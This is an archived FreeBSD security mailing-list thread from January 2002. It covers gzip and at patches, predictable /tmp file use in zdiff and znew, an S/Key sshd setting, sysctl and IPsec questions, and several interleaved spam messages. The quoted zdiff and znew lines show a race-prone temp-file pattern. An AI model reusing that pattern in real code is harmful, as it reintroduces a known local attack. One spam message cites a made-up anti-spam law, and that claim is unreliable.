patch: http://security.debian.org/dists/stable/updates/main/source/at_3.1.8-10.1.diff.gz Debian's at seems to be same origin with FreeBSD, and free() part in this patch (about check_for_user()) is identical with FreeBSD. -- Koga, Youichirou PS There are other problems, I think creat() and open() in at.c should be exclusive. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 0:46:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from TYO201.gate.nec.co.jp (TYO201.gate.nec.co.jp [202.32.8.214]) by hub.freebsd.org (Postfix) with ESMTP id 89CC437B400 for ; Thu, 17 Jan 2002 00:46:12 -0800 (PST) Received: from mailgate4.nec.co.jp ([10.7.69.193]) by TYO201.gate.nec.co.jp (8.11.6/3.7W01080315) with ESMTP id g0H8jvf00313; Thu, 17 Jan 2002 17:45:57 +0900 (JST) Received: from mailsv.nec.co.jp (mailgate51.nec.co.jp [10.7.69.196]) by mailgate4.nec.co.jp (8.11.6/3.7W-MAILGATE-NEC) with ESMTP id g0H8juC12578; Thu, 17 Jan 2002 17:45:56 +0900 (JST) Received: from necspl.do.mms.mt.nec.co.jp (necspl.do.mms.mt.nec.co.jp [10.16.5.21]) by mailsv.nec.co.jp (8.11.6/3.7W-MAILSV-NEC) with ESMTP id g0H8jIK03187; Thu, 17 Jan 2002 17:45:54 +0900 (JST) Received: from localhost (localhost [127.0.0.1]) by necspl.do.mms.mt.nec.co.jp (8.12.2/8.12.2) with ESMTP id g0H8jIXX011849; Thu, 17 Jan 2002 17:45:18 +0900 (JST) Date: Thu, 17 Jan 2002 17:45:18 +0900 (JST) Message-Id: <20020117.174518.102811786.y-koga@jp.FreeBSD.org> To: freebsd-security@FreeBSD.ORG Subject: gzip From: Koga Youichirou X-Mailer: Mew version 3.0.52 on Emacs 21.1 / Mule 5.0 (SAKAKI) In-Reply-To: <20011011.160941.74753041.y-koga@jp.FreeBSD.org> Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Debian announced gzip buffer overflow vuln: http://www.debian.org/security/2002/dsa-100 Debian's patch: http://security.debian.org/dists/stable/updates/main/source/gzip_1.2.4-33.1.diff.gz And the official patch has been released: http://www.gzip.org/gzip-1.2.4b.patch I know that FreeBSD's gzip has already fixed this problem in 1997, however Debian's patch includes other important fixes. I think that FreeBSD's zdiff and znew are also vulnerable. zdiff: F=`echo "$2" | sed 's|.*/||;s|[-.][zZtga]*||'` gzip -cdfq "$2" > /tmp/"$F".$$ znew: tmp=/tmp/zfoo.$$ echo hi > $tmp.1 echo hi > $tmp.2 too horrible ;) -- Koga, Youichirou To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 0:47:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from TYO201.gate.nec.co.jp (TYO201.gate.nec.co.jp [202.32.8.214]) by hub.freebsd.org (Postfix) with ESMTP id 287DB37B400 for ; Thu, 17 Jan 2002 00:47:38 -0800 (PST) Received: from mailgate4.nec.co.jp ([10.7.69.197]) by TYO201.gate.nec.co.jp (8.11.6/3.7W01080315) with ESMTP id g0H8lRf01355; Thu, 17 Jan 2002 17:47:27 +0900 (JST) Received: from mailsv4.nec.co.jp (mailgate51.nec.co.jp [10.7.69.190]) by mailgate4.nec.co.jp (8.11.6/3.7W-MAILGATE-NEC) with ESMTP id g0H8lLI05537; Thu, 17 Jan 2002 17:47:21 +0900 (JST) Received: from necspl.do.mms.mt.nec.co.jp (necspl.do.mms.mt.nec.co.jp [10.16.5.21]) by mailsv4.nec.co.jp (8.11.6/3.7W-MAILSV4-NEC) with ESMTP id g0H8lAG22287; Thu, 17 Jan 2002 17:47:20 +0900 (JST) Received: from localhost (localhost [127.0.0.1]) by necspl.do.mms.mt.nec.co.jp (8.12.2/8.12.2) with ESMTP id g0H8lAXX011869; Thu, 17 Jan 2002 17:47:10 +0900 (JST) Date: Thu, 17 Jan 2002 17:47:09 +0900 (JST) Message-Id: <20020117.174709.28435197.y-koga@jp.FreeBSD.org> To: freebsd-security@FreeBSD.ORG Subject: Re: sdiff tmpfile race condition From: Koga Youichirou In-Reply-To: <20011011.160941.74753041.y-koga@jp.FreeBSD.org> References: <20011011.160941.74753041.y-koga@jp.FreeBSD.org> X-Mailer: Mew version 3.0.52 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I'm afraid that FreeBSD's sdiff has the same vulnerability described > in following pages: > > http://www.kb.cert.org/vuls/id/579982 typo... http://www.kb.cert.org/vuls/id/579928 > http://www.securityfocus.com/bid/2191 > > Does anyone know current status about this? Regards, -- Koga, Youichirou To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 4:56:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from livroceres.com.br (w186.z064002049.smf-ca.dsl.cnc.net [64.2.49.186]) by hub.freebsd.org (Postfix) with SMTP id 832F837B417; Thu, 17 Jan 2002 04:54:24 -0800 (PST) From: "Livroceres" Subject: Informativo Date: Thu, 17 Jan 2002 10:52:49 -0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000C_01C19F45.1EAD05A0" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 X-MIMEOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Message-Id: <20020117125424.832F837B417@hub.freebsd.org> To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_000C_01C19F45.1EAD05A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable LIVROCERES LTDA=20 AGRONOMIA - VETERIN=C1RIA - ZOOTECNIA Fone / Fax: (0xx19) 3433-3733 & 3433-2277 Email: livroceres@livroceres.com.br=20 HomePage: http://www.livroceres.com.br Estaremos enviando quinzenalmente informa=E7=F5es de livros com assuntos = t=E9cnicos sobre: =20 - arquitetura / paisagismo / jardinagem - agropecu=E1ria - agricultura - entomologia - fitopatologia - controle qu=EDmico de plantas infestantes - silvicultura (florestas) - veterin=E1ria e zootecnia Caso n=E3o deseje receber esses informativos, clique aqui para = excluirmos seu e-mail de nosso cadastro. =20 (obs: n=E3o clique em responder (reply), clique no link indicado) Obrigado xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Esta mensagem =E9 enviada com a complac=EAncia da nova legisla=E7=E3o = sobre o Correio Eletr=F4nico, Se=E7=E3o 301, Par=E1grafo (a) (3) (c) = Decreto =A7 1618, T=EDtulo Terceiro aprovado pelo 105=BA Congresso Base = das Normativas Internacionais sobre o SPAM. Um e-mail n=E3o poder=E1 ser = considerado SPAM quando incluir uma forma de ser removido. E-MARKETING = N=C3O =C9 SPAM. ------=_NextPart_000_000C_01C19F45.1EAD05A0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
LIVROCERES LTDA
AGRONOMIA - = VETERIN=C1RIA -=20 ZOOTECNIA
Fone / = Fax: (0xx19)=20 3433-3733 & 3433-2277
HomePage: http://www.livroceres.com.br
 
Estaremos = enviando=20 quinzenalmente informa=E7=F5es de livros com assuntos = t=E9cnicos=20 sobre:
 
- arquitetura = / paisagismo=20 / jardinagem
-=20 agropecu=E1ria
 -=20 agricultura
-=20 entomologia
-=20 fitopatologia
- = controle qu=EDmico de=20 plantas infestantes
- = silvicultura=20 (florestas)
- = veterin=E1ria e=20 zootecnia
 
Caso = n=E3o deseje receber=20 esses informativos, clique aqui para excluirmos seu = e-mail de=20 nosso cadastro.
 
(obs: n=E3o clique = em responder=20 (reply), clique no link indicado)
 
Obrigado
 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx= xxxxxxxxxx
Esta mensagem =E9 = enviada com a=20 complac=EAncia da nova legisla=E7=E3o sobre o Correio Eletr=F4nico, = Se=E7=E3o 301, Par=E1grafo=20 (a) (3) (c) Decreto =A7 1618, T=EDtulo Terceiro aprovado pelo 105=BA = Congresso Base=20 das Normativas Internacionais sobre o SPAM. Um e-mail n=E3o poder=E1 ser = considerado=20 SPAM quando incluir uma forma de ser removido. E-MARKETING N=C3O = =C9=20 SPAM.
------=_NextPart_000_000C_01C19F45.1EAD05A0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 5:50:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from rip.psg.com (rip.psg.com [147.28.0.39]) by hub.freebsd.org (Postfix) with ESMTP id 7022637B404 for ; Thu, 17 Jan 2002 05:50:54 -0800 (PST) Received: from randy by rip.psg.com with local (Exim 3.33 #1) id 16RCwQ-0008cn-00 for freebsd-security@freebsd.org; Thu, 17 Jan 2002 05:50:54 -0800 From: Randy Bush MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: freebsd-security@freebsd.org Subject: s/key! Message-Id: Date: Thu, 17 Jan 2002 05:50:54 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i have never done anything wish s/key on either host. why am i getting this? (both quite recent -stable) ns0.psg.com:/usr/local/src/distfiles# rsy randy@rip.psg.com:bind-9.2.0.tar.gz . otp-md5 3 ri5788 ext S/Key Password: randy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 5:58:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from pcwin002.win.tue.nl (pcwin002.win.tue.nl [131.155.71.72]) by hub.freebsd.org (Postfix) with ESMTP id 858CD37B416 for ; Thu, 17 Jan 2002 05:58:25 -0800 (PST) Received: (from stijn@localhost) by pcwin002.win.tue.nl (8.11.6/8.11.4) id g0HDwIh72120; Thu, 17 Jan 2002 14:58:18 +0100 (CET) (envelope-from stijn) Date: Thu, 17 Jan 2002 14:58:18 +0100 From: Stijn Hoop To: Randy Bush Cc: freebsd-security@freebsd.org Subject: Re: s/key! Message-ID: <20020117145818.F76860@pcwin002.win.tue.nl> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="oLBj+sq0vYjzfsbl" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from randy@psg.com on Thu, Jan 17, 2002 at 05:50:54AM -0800 X-Bright-Idea: Let's abolish HTML mail! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --oLBj+sq0vYjzfsbl Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jan 17, 2002 at 05:50:54AM -0800, Randy Bush wrote: > i have never done anything wish s/key on either host. why am i getting > this? (both quite recent -stable) >=20 > ns0.psg.com:/usr/local/src/distfiles# rsy randy@rip.psg.com:bind-9.2.0.ta= r.gz . > otp-md5 3 ri5788 ext > S/Key Password:=20 This has bitten me before as well. Recent -STABLE turns S/Key on by default in /etc/ssh/sshd_config. Uncomment the line: # ChallengeResponseAuthentication no to disable S/Key again. HTH, --Stijn --=20 "I'm not under the alkafluence of inkahol that some thinkle peep I am. It's just the drunker I sit here the longer I get." --oLBj+sq0vYjzfsbl Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8Rth6Y3r/tLQmfWcRAm0qAJ0ftUGO/0NvEbX0gm6gBeoetLRHuwCfYMuG ZhmgGlxuZtJ9fr4jCe3LSFk= =/rj7 -----END PGP SIGNATURE----- --oLBj+sq0vYjzfsbl-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 6:12:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from rip.psg.com (rip.psg.com [147.28.0.39]) by hub.freebsd.org (Postfix) with ESMTP id 7468437B42F for ; Thu, 17 Jan 2002 06:12:25 -0800 (PST) Received: from randy by rip.psg.com with local (Exim 3.33 #1) id 16RDH7-0009Cm-00; Thu, 17 Jan 2002 06:12:17 -0800 From: Randy Bush MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Stijn Hoop Cc: freebsd-security@freebsd.org Subject: Re: s/key! References: <20020117145818.F76860@pcwin002.win.tue.nl> Message-Id: Date: Thu, 17 Jan 2002 06:12:17 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >> i have never done anything wish s/key on either host. why am i getting >> this? (both quite recent -stable) >> ns0.psg.com:/usr/local/src/distfiles# rsy randy@rip.psg.com:bind-9.2.0.tar.gz . >> otp-md5 3 ri5788 ext >> S/Key Password: > This has bitten me before as well. Recent -STABLE turns S/Key on by > default in /etc/ssh/sshd_config. Uncomment the line: > # ChallengeResponseAuthentication no > to disable S/Key again. bingo! thank you. randy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 10:16:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from snmail.softnet.ro (snmail.SoftNet.ro [193.231.173.3]) by hub.freebsd.org (Postfix) with ESMTP id 19DB937B402 for ; Thu, 17 Jan 2002 10:16:07 -0800 (PST) Received: from hera ([193.231.173.29]) by snmail.softnet.ro (Lotus Domino Release 5.0.5) with SMTP id 2002011720182175:7752 ; Thu, 17 Jan 2002 20:18:21 +0200 Message-ID: <001e01c19f83$62cf75e0$1dade7c1@hera> From: "Florin MANAILA" To: Subject: Sysctl var. Date: Thu, 17 Jan 2002 20:18:38 +0200 MIME-Version: 1.0 X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 Disposition-Notification-To: "Florin MANAILA" X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 X-MIMETrack: Itemize by SMTP Server on server1/softnet(Release 5.0.5 |September 22, 2000) at 01/17/2002 08:18:21 PM, Serialize by Router on server1/softnet(Release 5.0.5 |September 22, 2000) at 01/17/2002 08:18:24 PM, Serialize complete at 01/17/2002 08:18:24 PM Content-Type: multipart/alternative; boundary="----=_NextPart_000_001B_01C19F94.263E5540" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_001B_01C19F94.263E5540 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset="iso-8859-1" Hi all, For what is this sysctl var. : net.inet.tcp.blackhole: 0 net.inet.udp.blackhole:0=20 and net.inet.tcp.log_in_vain:0 net.inet.udp.log_in_vain:0 ???? Best regards, _________________________________________________________________________= ___ Florin MANAILA ISSO SoftNet Services Calea Floreasca 167 Bucuresti ROMANIA Tel: 04 - 01 - 2331133 Fax: 04 - 01 - 2331177 http://www.softnet.ro ------=_NextPart_000_001B_01C19F94.263E5540 Content-Transfer-Encoding: quoted-printable Content-Type: text/html; charset="iso-8859-1"
Hi all,
 
For what is this sysctl var. = :
net.inet.tcp.blackhole: 0
net.inet.udp.blackhole:0
 
and
 
net.inet.tcp.log_in_vain:0
net.inet.udp.log_in_vain:0
 
????
 
Best regards,
________________________________________________________________= ____________
Florin=20 MANAILA
ISSO
SoftNet Services
Calea Floreasca=20 167
Bucuresti
ROMANIA
Tel: 04 - 01 - 2331133
Fax: 04 - 01 -=20 2331177
http://www.softnet.ro
------=_NextPart_000_001B_01C19F94.263E5540-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 10:30: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc53.attbi.com (rwcrmhc53.attbi.com [204.127.198.39]) by hub.freebsd.org (Postfix) with ESMTP id 5DA2A37B41A for ; Thu, 17 Jan 2002 10:30:03 -0800 (PST) Received: from bmah.dyndns.org ([12.233.149.189]) by rwcrmhc53.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020117183003.UDAK10199.rwcrmhc53.attbi.com@bmah.dyndns.org>; Thu, 17 Jan 2002 18:30:03 +0000 Received: (from bmah@localhost) by bmah.dyndns.org (8.11.6/8.11.6) id g0HIU2633479; Thu, 17 Jan 2002 10:30:02 -0800 (PST) (envelope-from bmah) Message-Id: <200201171830.g0HIU2633479@bmah.dyndns.org> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: "Florin MANAILA" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sysctl var. In-reply-to: <001e01c19f83$62cf75e0$1dade7c1@hera> References: <001e01c19f83$62cf75e0$1dade7c1@hera> Comments: In-reply-to "Florin MANAILA" message dated "Thu, 17 Jan 2002 20:18:38 +0200." From: "Bruce A. Mah" Reply-To: bmah@FreeBSD.ORG X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 17 Jan 2002 10:30:02 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org If memory serves me right, "Florin MANAILA" wrote: > For what is this sysctl var. : > net.inet.tcp.blackhole: 0 > net.inet.udp.blackhole:0=20 > > and > > net.inet.tcp.log_in_vain:0 > net.inet.udp.log_in_vain:0 man tcp man udp Bruce. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 11:48:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from marlo.eagle.ca (marlo.eagle.ca [209.167.16.10]) by hub.freebsd.org (Postfix) with ESMTP id 8376C37B402 for ; Thu, 17 Jan 2002 11:48:05 -0800 (PST) Received: from Bob (staff.eagle.ca [209.167.16.15]) by marlo.eagle.ca (8.11.3/8.11.3) with ESMTP id g0HJk9p26775; Thu, 17 Jan 2002 14:46:10 -0500 (EST) (envelope-from freymann@eagle.ca) From: "ScaryG" To: "Florin MANAILA" , Date: Thu, 17 Jan 2002 14:49:02 -0500 MIME-Version: 1.0 Subject: Re: Sysctl var. Message-ID: <3C46E45E.8636.1565194@localhost> In-reply-to: <001e01c19f83$62cf75e0$1dade7c1@hera> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 17 Jan 2002 at 20:18, Florin MANAILA wrote: > For what is this sysctl var. : > net.inet.tcp.blackhole: 0 > net.inet.udp.blackhole:0 man 4 blackhole gf To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 16:23: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from fl-mta03.durocom.com (fl-mta03.durocom.com [216.53.195.244]) by hub.freebsd.org (Postfix) with ESMTP id 4706E37B400; Thu, 17 Jan 2002 16:22:42 -0800 (PST) Received: from [198.69.78.81] by fl-mta03.durocom.com with SMTP id <20020118002239.HNGN2366.fl-mta03@[198.69.78.81]>; Thu, 17 Jan 2002 19:22:39 -0500 From: rej@caae.com To: kuro18@hotmail.com Subject: Great News Date: Thu, 17 Jan 2002 18:17:36 -0600 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_6295_00005913.0000003E" X-Priority: 3 X-MSMail-Priority: Normal Message-Id: <20020118002239.HNGN2366.fl-mta03@[198.69.78.81]> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------=_NextPart_000_6295_00005913.0000003E Content-Type: text/html; ViaPro

To be removed from future mailings CLICK HERE

 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 17:42:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by hub.freebsd.org (Postfix) with ESMTP id 2526437B402 for ; Thu, 17 Jan 2002 17:42:10 -0800 (PST) Received: from hades.hell.gr (patr530-a038.otenet.gr [212.205.215.38]) by mailsrv.otenet.gr (8.11.5/8.11.5) with ESMTP id g0I1g7w18409; Fri, 18 Jan 2002 03:42:08 +0200 (EET) Received: (from charon@localhost) by hades.hell.gr (8.11.6/8.11.6) id g0HLnJh41791; Thu, 17 Jan 2002 23:49:19 +0200 (EET) (envelope-from keramida@ceid.upatras.gr) Date: Thu, 17 Jan 2002 23:49:19 +0200 From: Giorgos Keramidas To: Florin MANAILA Cc: freebsd-security@freebsd.org Subject: Re: Sysctl var. Message-ID: <20020117214919.GB41441@hades.hell.gr> References: <001e01c19f83$62cf75e0$1dade7c1@hera> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <001e01c19f83$62cf75e0$1dade7c1@hera> User-Agent: Mutt/1.3.25i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 2002-01-17 20:18:38, Florin MANAILA wrote: > For what is this sysctl var. : > net.inet.tcp.blackhole: 0 > net.inet.udp.blackhole: 0 The manpages explain what these are about/for: blackhole(4) should help you with these. > net.inet.tcp.log_in_vain: 0 > net.inet.udp.log_in_vain: 0 tcp(4) and udp(4) for these :) -- Giorgos Keramidas . . . . . . . . . keramida@{ceid.upatras.gr,freebsd.org} FreeBSD Documentation Project . . . http://www.freebsd.org/docproj/ FreeBSD: The power to serve . . . . http://www.freebsd.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 17 21: 5:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.cise.ufl.edu (beach.cise.ufl.edu [128.227.205.211]) by hub.freebsd.org (Postfix) with ESMTP id DA43037B400 for ; Thu, 17 Jan 2002 21:05:32 -0800 (PST) Received: from cise.ufl.edu (waterspout.cise.ufl.edu [128.227.205.52]) by mail.cise.ufl.edu (Postfix) with ESMTP id ECC9A6BAA for ; Fri, 18 Jan 2002 00:05:31 -0500 (EST) To: security@freebsd.org Subject: IPSEC into network behind the primary router X-mailer: nmh-1.0.3/vi Date: Fri, 18 Jan 2002 00:05:31 -0500 From: "James F. Hranicky" Message-Id: <20020118050532.ECC9A6BAA@mail.cise.ufl.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'd like to be able to set up an IPSEC gateway into my current network setup without making sweeping changes to the network topology, something like: ---------- [net 1]-| | | | | [internet]------[primary router] -------- [net 2]-| | | | | | | | ---------- [net 3]-| | | | | [ipsec tunnel box]-------------- What I'm wondering is if the following is possible: [ipsec client] | ---------- [net 1] 1.1.1.0/24 | | | M [internet]------[primary router] N------- [net 2] 1.1.2.0/24 A B O | | | | | ---------- [net 3] 1.1.3.0/24 | | | | | | | | | | X Y [ipsec tunnel/nat box] A = 1.1.4.1/30 X = 1.1.4.2/30 B = 1.1.4.5/30 Y = 1.1.4.6/30 The scenario: - random ipsec client initiates an ipsec tunnel with the ipsec tunnel box attached to my primary router - the packet hits interface X and is decrypted. The ipsec server decrypts the packet and finds it's destined for [net 1] with a source of [ipsec client]. - interface Y is set up nat, and the routing tables send packets destined for [nets 123] out interface Y with a source of Y and packets destined for [ipsec client] back out through interface X -- this way, packets originally from [ipsec client] don't go out interfaces [MNO] by mistake. I suppose if this doesn't work I'm left with transport mode and a gateway machine, or changing how I currently do routing for my site. Any help appreciated, ---------------------------------------------------------------------- | Jim Hranicky, Senior SysAdmin UF/CISE Department | | E314D CSE Building Phone (352) 392-1499 | | jfh@cise.ufl.edu http://www.cise.ufl.edu/~jfh | ---------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 18 3: 7:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from www.yahho.com (28.c210-85-16.ethome.net.tw [210.85.16.28]) by hub.freebsd.org (Postfix) with SMTP id EC55637B417; Fri, 18 Jan 2002 03:07:09 -0800 (PST) Received: from titan by kimo.com with SMTP id Q09smRtxzFPg7roxLZPG; Fri, 18 Jan 2002 19:15:28 +0800 Message-ID: From: J4OYBdUF08g@pavo.seed.net.tw To: FLHe3X9ar9AnPY@tpts8.seed.net.tw Subject: MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_t75bPXRkhRqbq3Hnf" X-Priority: 3 X-MSMail-Priority: Normal Date: Fri, 18 Jan 2002 03:07:09 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_t75bPXRkhRqbq3Hnf Content-Type: multipart/alternative; boundary="----=_NextPart_t75bPXRkhRqbq3HnfAA" ------=_NextPart_t75bPXRkhRqbq3HnfAA Content-Type: text/html; charset="big5" Content-Transfer-Encoding: base64 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50 PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8bWV0YSBuYW1lPSJHRU5FUkFUT1IiIGNvbnRl bnQ9Ik1pY3Jvc29mdCBGcm9udFBhZ2UgNC4wIj4NCjxtZXRhIG5hbWU9IlByb2dJZCIgY29udGVu dD0iRnJvbnRQYWdlLkVkaXRvci5Eb2N1bWVudCI+DQo8dGl0bGU+t1GmXqj9u1CxoaRIquymuMHb sG2qurT+qP223DwvdGl0bGU+DQo8L2hlYWQ+DQoNCjxib2R5Pg0KDQq3UaZeqP27ULGhpEiq7Ka4 wduwbaq6tP6o/bbcPyCxeqq6qkKkzSC3UbnvsXq7oaFBIHcgDQqn1qjspUikVaq6uvSttqzdrN0g Xl9fX19fX19fX19eIKVWpNGsT63TvkGmWMXKt1Kquql1uGChQSEgDQqkXbdRqNOt0672uqnB27Bt ttyhSCBcKCotKikvIGlWaWRlb7tQp0GqurLEpECmuMHbsG08YnI+DQo8YSBocmVmPSJodHRwOi8v d3d3Lml2aWRlby5jb20udHciPmh0dHA6Ly93d3cuaXZpZGVvLmNvbS50dzwvYT48YnI+DQo8YSBo cmVmPSJodHRwOi8vd3d3Lml2aWRlby5jb20udHcvZmxhc2gvcm9tYW5jZS5hc3AiPmh0dHA6Ly93 d3cuaXZpZGVvLmNvbXR3L2ZsYXNoL3JvbWFuY2UuYXNwPC9hPg0KPHA+oUA8L3A+DQo8cD6hQA0K PG9iamVjdCBjbGFzc2lkPSJjbHNpZDpEMjdDREI2RS1BRTZELTExY2YtOTZCOC00NDQ1NTM1NDAw MDAiIGNvZGVCYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2 ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NCwwLDIsMCIgaGVpZ2h0PSIzMjQiIHdp ZHRoPSI1NTAiPg0KICA8cGFyYW0gTkFNRT0iX2N4IiBWQUxVRT0iMTQ1NTIiPg0KICA8cGFyYW0g TkFNRT0iX2N5IiBWQUxVRT0iODU3MyI+DQogIDxwYXJhbSBOQU1FPSJNb3ZpZSIgVkFMVUU9Imh0 dHA6Ly93d3cuaXZpZGVvLmNvbS50dy9mbGFzaC91bmNsZS5zd2YiPg0KICA8cGFyYW0gTkFNRT0i U3JjIiBWQUxVRT0iaHR0cDovL3d3dy5pdmlkZW8uY29tLnR3L2ZsYXNoL3VuY2xlLnN3ZiI+DQog 